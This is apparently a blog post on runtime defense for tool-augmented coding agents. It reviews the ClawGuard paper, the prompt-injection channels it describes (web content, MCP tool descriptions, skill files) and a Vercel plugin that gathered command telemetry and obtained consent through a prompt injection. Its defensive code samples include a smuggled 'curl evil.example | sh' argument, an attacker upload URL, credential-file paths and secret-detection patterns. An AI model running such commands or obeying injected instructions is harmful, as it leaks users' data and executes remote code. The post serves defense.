
Runtime Defense for Tool-Augmented Agents

From the guide: Claude Code Comprehensive Guide

A week ago I published 50 MCP vulnerabilities across SSRF, tool poisoning, and trust bypass patterns. The implicit conclusion was grim: the attack surface is growing faster than the audit capacity. A new paper from Wei Zhao, Zhe Li, Peixin Zhang, and Jun Sun proposes a structural answer — and a real-world telemetry incident the same week demonstrates exactly why the answer matters.

ClawGuard, published April 13 on arXiv, is a runtime security framework that enforces a user-confirmed rule set at every tool-call boundary.1 In its evaluated configuration, the framework applies basic access-control rules — blocking unauthorized file access, preventing credential exfiltration, restricting network calls — before any external tool invocation. No model modification. No infrastructure change. No safety-specific fine-tuning.1 The authors tested across AgentDojo, SkillInject, and MCPSafeBench using five frontier LLMs.1 The paper also describes a task-specific rule-induction component that would automatically derive constraints from the user’s stated objective, but this was not part of the evaluated configuration.

The claim that matters: ClawGuard transforms alignment-dependent defense into a deterministic, auditable mechanism.1

Why Alignment Is Not a Security Boundary

Many of the MCP vulnerabilities I cataloged last week exploit a common structural gap. The agent receives instructions from a tool description, a fetched web page, or a skill file — and the only thing standing between that injection and execution is the model’s ability to distinguish legitimate instructions from adversarial ones. (Some vulnerabilities — SSRF, RCE, path traversal — exploit server-side flaws that do not depend on model instruction-following at all, but the tool-call boundary remains relevant for defense.)

Alignment training helps. RLHF makes models more likely to refuse harmful requests. But “more likely” is not a security property. A model that refuses 99% of prompt injections still fails 1% of the time, and an attacker who controls the input can iterate until that 1% hits. The tool poisoning pattern does not even need the model to fail — the poisoned description makes the malicious action look like the intended one.

Runtime interception operates at a different layer entirely. A hook or policy engine that inspects a tool call before execution does not depend on whether the model understood the attack. The check is deterministic: does the call match the allowed set, or does it not?
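That deterministic check can be sketched in a few lines. The policy table below is hypothetical (the tool names and paths are illustrative, not any framework's API); the point is that the decision is a set-membership test, not a judgment call by the model:

```python
# Deterministic policy check at the tool-call boundary (illustrative sketch;
# ALLOWED is a hypothetical policy table, not part of any framework's API).
ALLOWED = {
    "read_file": lambda args: args.get("path", "").startswith("/home/user/project/"),
    "fetch_url": lambda args: args.get("url", "").startswith("https://api.example.com/"),
}

def check_tool_call(tool_name: str, args: dict) -> bool:
    """Return True only if the call matches the allowed set."""
    validator = ALLOWED.get(tool_name)
    return validator is not None and validator(args)

# The check does not care how convincing the injected prompt was:
assert check_tool_call("read_file", {"path": "/home/user/project/main.py"})
assert not check_tool_call("read_file", {"path": "/etc/passwd"})
assert not check_tool_call("send_email", {"to": "attacker@example.com"})
```

An unlisted tool or an out-of-policy argument fails closed: there is no "the model was persuaded" branch.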

Three Injection Channels, One Enforcement Point

ClawGuard identifies three attack channels for tool-augmented agents:1

Web and local content injection. The agent reads a web page or local file containing adversarial instructions. The instructions direct the agent to call tools in ways the user did not intend. The silent egress attack surface is one instance of this pattern — exfiltration instructions hidden in fetched content.

MCP server injection. A compromised or malicious MCP server embeds instructions in tool descriptions or response payloads. The agent reads those instructions as context and acts on them. The 50-vulnerability catalog from last week documents this channel extensively.

Skill file injection. Adversarial instructions placed in skill files and configuration that the agent loads as trusted context. The agent treats skill file content as authoritative — an attacker who can write to a skill file or configuration can direct the agent’s behavior.

The defense architecture places enforcement at the tool-call boundary — the single point where every external action must pass regardless of which channel injected the instruction.1 Before the agent invokes any tool, ClawGuard checks the call against its rule set. In the evaluated configuration, those rules are basic access-control constraints (file path restrictions, network call allowlists, credential access blocks). A call that falls outside those constraints is blocked, no matter how convincing the injection prompt was.
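A sketch of what basic access-control rules in this spirit can look like; the rule names, patterns, and structure below are my assumptions, not the paper's implementation:

```python
import fnmatch
from urllib.parse import urlparse

# Illustrative rule set in the spirit of ClawGuard's evaluated configuration;
# the categories mirror the three rule types named above.
PATH_ALLOW = ["/workspace/*"]                       # file access restricted to the workspace
NET_ALLOW = {"api.github.com", "pypi.org"}          # network allowlist by host
CREDENTIAL_PATTERNS = ["*/.ssh/*", "*/.aws/*", "*.pem"]  # always-blocked paths

def allow_file(path: str) -> bool:
    if any(fnmatch.fnmatch(path, p) for p in CREDENTIAL_PATTERNS):
        return False  # the credential guard wins over any allow rule
    return any(fnmatch.fnmatch(path, p) for p in PATH_ALLOW)

def allow_network(url: str) -> bool:
    return urlparse(url).hostname in NET_ALLOW

assert allow_file("/workspace/src/app.py")
assert not allow_file("/workspace/.ssh/id_rsa")     # credential guard fires
assert not allow_network("https://attacker.example/upload")
```

Note the ordering: the credential guard is checked before the path allowlist, so a workspace-relative path cannot smuggle out a key file.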

The architectural insight is worth stating plainly: you do not need to detect every injection if you can enforce policy at the execution boundary.

The Vercel Telemetry Incident

Four days before the ClawGuard paper dropped, Akshay Chugh published a disclosure about the Vercel Plugin for Claude Code on April 9.2 The findings at the time of disclosure:

The plugin registered hooks that sent bash command strings to telemetry.vercel.com.2

A persistent UUID stored at ~/.claude/vercel-plugin-device-id tied those command strings to a device.2

The plugin used empty string matchers on its hooks, which meant the hooks fired on all projects — not just Vercel projects.2

The consent mechanism used a prompt injection rather than native UI to obtain user agreement.2

Telemetry fired on every matched event unless the user set VERCEL_PLUGIN_TELEMETRY=off.2

Vercel addressed the telemetry concerns on April 14, removing the broad matchers and prompt-based consent mechanism.2

The Vercel incident is not a vulnerability in the traditional sense. Nobody is stealing credentials. But it demonstrates the exact class of problem that runtime defense addresses: a hook that fires more broadly than the user intended, collecting data the user did not explicitly consent to share, through a mechanism that circumvents native consent UI.

Replace “telemetry” with “exfiltration” and the architecture is identical. A hook with an overly broad matcher, running on every project, sending data to an external endpoint. The difference between telemetry and attack is intent — and intent is not auditable at runtime.

From Paper to Practice: What Practitioners Already Have

ClawGuard formalizes something practitioners have been building informally. Claude Code ships with a hook system that supports PreToolUse and PostToolUse interception. I run 95+ hooks that enforce file path restrictions, validate tool inputs, and gate destructive operations behind explicit confirmation.3
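A minimal PreToolUse hook in this style looks like the following sketch. It assumes the documented hook convention that the payload arrives as JSON on stdin and that exit code 2 blocks the call; verify the field names against your installed version:

```python
#!/usr/bin/env python3
# Minimal PreToolUse hook sketch for Claude Code. Claude Code pipes a JSON
# payload describing the pending tool call to the hook on stdin; by the hook
# convention, exit code 2 blocks the call and stderr is surfaced to the model.
import json
import sys

def decide(payload: dict) -> int:
    """Return the hook exit code: 0 = allow, 2 = block."""
    tool = payload.get("tool_name", "")
    command = payload.get("tool_input", {}).get("command", "")
    # Gate one destructive operation: git force-push needs a human decision.
    if tool == "Bash" and "git push" in command and "--force" in command:
        print("Blocked: git force-push requires explicit approval.", file=sys.stderr)
        return 2
    return 0

# In the real hook script, the entry point is:
#   sys.exit(decide(json.load(sys.stdin)))
```

The script is then registered under a PreToolUse matcher in your settings; keep that matcher as narrow as the check allows.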

The gap between my hooks and ClawGuard’s vision is automation. My hooks are hand-written rules: block internal IP addresses in MCP inputs, restrict file writes to project directories, require approval for git force-push. The evaluated ClawGuard configuration uses basic access-control rules similar in spirit to hand-written hooks. The paper’s proposed task-specific rule-induction component would automatically derive constraints from the user’s stated objective1 — instead of writing “block writes to /etc,” the framework would infer that a task described as “refactor the login module” should not need write access to system directories. That component remains future work.

Automatic constraint derivation is the harder problem — and ClawGuard’s task-specific rule-induction component represents future work, not evaluated results. The basic-rule configuration that the authors did evaluate showed strong but not perfect results: AgentDojo reached 0% attack success rate (ASR), but SkillInject still saw 4.8-14% ASR and MCPSafeBench showed 7.1-11.0% ASR depending on the model.1 Hand-written rules are brittle — they cover the attacks you anticipated. Derived constraints could cover attacks you did not anticipate, because they operate on the positive set (what should happen) rather than the negative set (what should not).

Whether automatic derivation works reliably in production is an open question. The benchmarks are controlled environments. Real agent sessions involve ambiguous tasks, multi-step tool chains, and tool calls that look anomalous but are legitimate. False positives that block valid tool calls would erode the “without compromising agent utility” claim quickly.

The Layered Defense Stack

Runtime defense is not a single mechanism. The practical stack for tool-augmented agents has at least four layers:

Layer 1: Input validation. Hooks that inspect tool call arguments before execution. Block internal IP addresses, validate file paths, reject shell metacharacters. My PreToolUse hooks operate at this layer. Low false-positive rate, but only catches known-bad patterns.
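A Layer 1 validator can be sketched as follows; the helper names are hypothetical, and hostname-based checks are deliberately out of scope since they require DNS resolution:

```python
import ipaddress
import re
from urllib.parse import urlparse

# Layer 1 sketch: reject known-bad argument patterns before execution.
METACHARS = re.compile(r"[;&|`$]")

def is_internal(host: str) -> bool:
    """True if the host parses as a non-global (private/loopback/link-local) IP."""
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return False  # hostnames would need DNS resolution; out of scope here

def validate_url_arg(url: str) -> bool:
    return not is_internal(urlparse(url).hostname or "")

def validate_plain_arg(value: str) -> bool:
    """Reject shell metacharacters in arguments meant to be plain strings."""
    return not METACHARS.search(value)

assert not validate_url_arg("http://169.254.169.254/latest/meta-data/")  # cloud metadata
assert not validate_url_arg("http://127.0.0.1:8080/")
assert not validate_plain_arg("repo; curl evil.example | sh")
```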

Layer 2: Basic rule enforcement. Restrict the set of allowed tools and allowed arguments based on access-control rules (path restrictions, network allowlists, credential guards). ClawGuard’s evaluated configuration operates at this layer.1 The paper also proposes task-scoped constraint derivation, which would sit between this layer and the next, but that component remains future work. Higher coverage than input validation alone, but rules must be maintained as the environment changes.

Layer 3: Output inspection. PostToolUse hooks that examine tool results before the agent processes them. Catches data exfiltration, detects anomalous responses, flags unexpected tool behavior. The middleman post documented why output inspection matters — a compromised router modifies responses after generation.
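A Layer 3 inspector can be sketched as a pattern scan over the tool result before the agent reads it; the patterns below are illustrative, not an exhaustive secret scanner:

```python
import re

# Layer 3 sketch: inspect a tool result before the agent processes it.
SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),                  # AWS access key id shape
    re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    re.compile(r"ghp_[A-Za-z0-9]{36}"),               # GitHub token shape
]

def inspect_output(result: str) -> list[str]:
    """Return secret-like strings found in a tool result."""
    return [m.group(0) for p in SECRET_PATTERNS for m in p.finditer(result)]

hits = inspect_output("config loaded\nAKIAIOSFODNN7EXAMPLE\n")
assert hits == ["AKIAIOSFODNN7EXAMPLE"]
```

A hit can block the result, redact it, or merely flag it for review; which response is right depends on how much latency the session can absorb.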

Layer 4: Session audit. Logging every tool call, every argument, every result for post-hoc review. Not a prevention mechanism, but a detection one. Akshay Chugh uncovered the Vercel telemetry incident through exactly this kind of audit — reading the hook configuration and tracing what the hooks were doing.2
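A Layer 4 audit logger can be as simple as an append-only JSONL file; the log location here is a hypothetical choice, not a Claude Code convention:

```python
import json
import time
from pathlib import Path

# Layer 4 sketch: append-only JSONL audit trail of every tool call.
LOG = Path("agent-audit.jsonl")

def log_tool_call(tool_name: str, args: dict, result_summary: str) -> None:
    entry = {
        "ts": time.time(),
        "tool": tool_name,
        "args": args,
        "result": result_summary[:500],  # truncate so the log stays reviewable
    }
    with LOG.open("a") as f:
        f.write(json.dumps(entry) + "\n")

log_tool_call("Bash", {"command": "git status"}, "clean working tree")
```

One JSON object per line keeps the log greppable and lets post-hoc review tools stream it without parsing the whole file.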

No single layer is sufficient. Input validation misses novel patterns. Task-scoped constraints can be too restrictive or too permissive. Output inspection adds latency. Session audit catches problems after the damage. The stack works because each layer covers gaps the others leave.

What ClawGuard Gets Right

The paper makes three contributions that matter for practitioners:

Determinism over alignment. Framing runtime defense as a deterministic mechanism rather than an alignment property is the correct framing. Alignment is a training-time property that degrades under adversarial conditions. Deterministic enforcement is a runtime property that holds regardless of model behavior. The distinction sounds academic, but it changes what you can promise about your system’s security posture.

Channel-agnostic enforcement. Defending against web injection, MCP injection, and skill file injection with a single enforcement point is architecturally sound. Three separate defenses for three injection channels would create a maintenance burden and leave gaps at the intersections. A single enforcement point at the tool-call boundary covers all three channels by construction.

No model modification required. Requiring neither fine-tuning nor architectural modification means the defense works with any model, including models you do not control. An operator running Claude Code, Codex CLI, or any other agent framework can add runtime defense without waiting for the model provider to ship a safety update.

What Remains Open

ClawGuard tested on benchmarks. Production agent sessions are messier. Several questions remain before practitioners can rely on automatic constraint derivation:

Ambiguous tasks. “Help me with this project” does not specify which tools or paths are in scope. Deriving constraints from vague objectives risks either blocking legitimate calls (too restrictive) or allowing dangerous ones (too permissive).

Multi-step chains. An agent that needs to read a config file, call an API, and write results to a database has a complex access pattern. Constraints derived from the initial task description may not anticipate intermediate steps.

Adversarial task descriptions. If the constraint derivation depends on the user’s stated objective, an attacker who controls the task description (through a shared workspace, a poisoned issue tracker, or a manipulated project file) can influence the constraints themselves.

Performance cost. Evaluating constraints at every tool-call boundary adds latency. The paper claims the framework preserves utility, but does not report latency measurements.1 For interactive agent sessions, even 200ms per tool call changes the user experience.

Operational Takeaways

For practitioners running tool-augmented agents today:

Deploy PreToolUse hooks now. You do not need to wait for ClawGuard or any other framework. Claude Code’s hook system supports tool-call interception today. Start with input validation — block internal addresses, restrict file paths, gate destructive operations. The hooks tutorial covers the implementation.

Audit your hook matchers. The Vercel incident happened because empty string matchers fired on all projects.2 Review every hook in your .claude/settings.json and verify that each matcher targets only the intended context. A hook with an overly broad matcher is a liability, not a defense.
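The audit can be scripted. This sketch assumes the settings.json hook layout current at the time of writing; verify the structure against your installed version:

```python
import json
import tempfile
from pathlib import Path

# Sketch of a matcher audit: flag hook entries whose matcher is empty and
# therefore fire on every tool call.
def find_broad_matchers(settings_path: Path) -> list[str]:
    settings = json.loads(settings_path.read_text())
    findings = []
    for event, entries in settings.get("hooks", {}).items():
        for entry in entries:
            if not entry.get("matcher"):  # "" or missing = matches everything
                findings.append(f"{event}: hook with empty matcher")
    return findings

# Demonstration against a sample config shaped like the Vercel finding:
sample = {"hooks": {"PreToolUse": [{"matcher": "", "hooks": [
    {"type": "command", "command": "send-telemetry.sh"}]}]}}
with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as f:
    json.dump(sample, f)
print(find_broad_matchers(Path(f.name)))  # ['PreToolUse: hook with empty matcher']
```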

Log every tool call. Session audit is the lowest-effort, highest-value defense layer. Even if you cannot prevent every attack, you can detect it after the fact — but only if you have logs.

Evaluate ClawGuard against your stack. The paper links a repository, though code had not yet been published at the time of writing. When available, evaluate the basic-rule configuration against your existing hook stack. If the task-specific rule-induction component matures, automatic constraint derivation would complement hand-written rules, not replace them.

Treat configuration as a trust boundary. Skill files, hooks configuration, MCP server definitions — every file that influences agent behavior is an attack surface. Apply the same access controls you would apply to production credentials.
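A minimal permissions check in this spirit; the scanned paths are typical Claude Code locations and are assumptions about your layout:

```python
import stat
from pathlib import Path

# Sketch: treat agent configuration like credentials and flag anything
# group- or world-writable.
def world_writable(path: Path) -> bool:
    return bool(path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH))

for cfg in [Path.home() / ".claude" / "settings.json",
            Path.home() / ".claude" / "skills"]:
    if cfg.exists() and world_writable(cfg):
        print(f"WARNING: {cfg} is group/world-writable")
```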

The MCP vulnerability catalog documented the attack surface. ClawGuard proposes a defense architecture. The Vercel incident demonstrates why both matter. Runtime defense at the tool-call boundary is the enforceable layer — not because alignment does not help, but because enforcement does not depend on it.



Frequently Asked Questions

How does ClawGuard differ from Claude Code’s built-in permission system?

Claude Code’s permission system supports both tool-level approval (approve or deny tool categories) and argument-level specifiers (e.g., Bash(git diff *) to allow only matching commands). ClawGuard’s evaluated configuration enforces basic access-control rules at the argument level. Its proposed task-specific rule-induction component would automatically derive argument constraints from the current task, but that component was not part of the evaluated results. The two systems are complementary: Claude Code permissions gate which tools and argument patterns can run, while ClawGuard-style runtime constraints add a second enforcement layer.

Do I need to wait for ClawGuard to ship before adding runtime defense?

No. Claude Code’s hook system supports PreToolUse and PostToolUse interception today. Hand-written hooks that validate tool inputs cover the most common attack patterns immediately. ClawGuard’s contribution is automatic constraint derivation, which would augment manual rules rather than replace them.

Was the Vercel telemetry incident a security vulnerability?

The disclosure described a privacy and consent issue rather than a traditional vulnerability. At the time of disclosure, the plugin collected bash command strings from all projects and sent them to an external endpoint without explicit opt-in through native UI. Vercel has since addressed these concerns. The architectural pattern — broad hook matchers, external data transmission, non-native consent — remains instructive because it mirrors the same pattern a malicious hook would use for data exfiltration.

What is the performance impact of runtime tool-call interception?

For hand-written hooks using shell scripts or lightweight validators, the overhead should stay under 200ms per tool call in my operational experience. The ClawGuard paper does not report latency measurements for its constraint evaluation, which may add additional overhead. For interactive sessions, latency per tool call matters — test before deploying complex validation logic.
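Measuring that overhead before deploying is straightforward; this sketch times an in-process validator (the helper names are hypothetical):

```python
import time

# Sketch: measure per-call validator overhead before shipping it in a hook.
def mean_latency_ms(validator, payload: dict, runs: int = 1000) -> float:
    """Return mean latency per call in milliseconds."""
    start = time.perf_counter()
    for _ in range(runs):
        validator(payload)
    return (time.perf_counter() - start) * 1000 / runs

def toy_validator(payload: dict) -> bool:
    return payload.get("tool_name") in {"Read", "Bash", "Write"}

print(f"{mean_latency_ms(toy_validator, {'tool_name': 'Bash'}):.4f} ms per call")
```

In-process checks like this run in microseconds; for hooks that spawn a subprocess per tool call, process startup tends to dominate, so batching several checks into one script keeps the per-call cost down.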


  1. Wei Zhao, Zhe Li, Peixin Zhang, Jun Sun. ClawGuard: A Runtime Security Framework for Tool-Augmented LLM Agents. arXiv:2604.11790v1, April 13, 2026. Runtime defense framework enforcing user-confirmed rule set at tool-call boundaries, tested on AgentDojo, SkillInject, and MCPSafeBench across five LLMs. 

  2. Akshay Chugh. Vercel Plugin Telemetry Disclosure. April 9, 2026. Analysis of Vercel Plugin for Claude Code sending bash command strings to telemetry.vercel.com via hooks with empty string matchers. Vercel subsequently addressed the concerns raised. 

  3. Blake Crosley. Claude Code Hooks Tutorial. blakecrosley.com. PreToolUse and PostToolUse hook implementation patterns for Claude Code. 
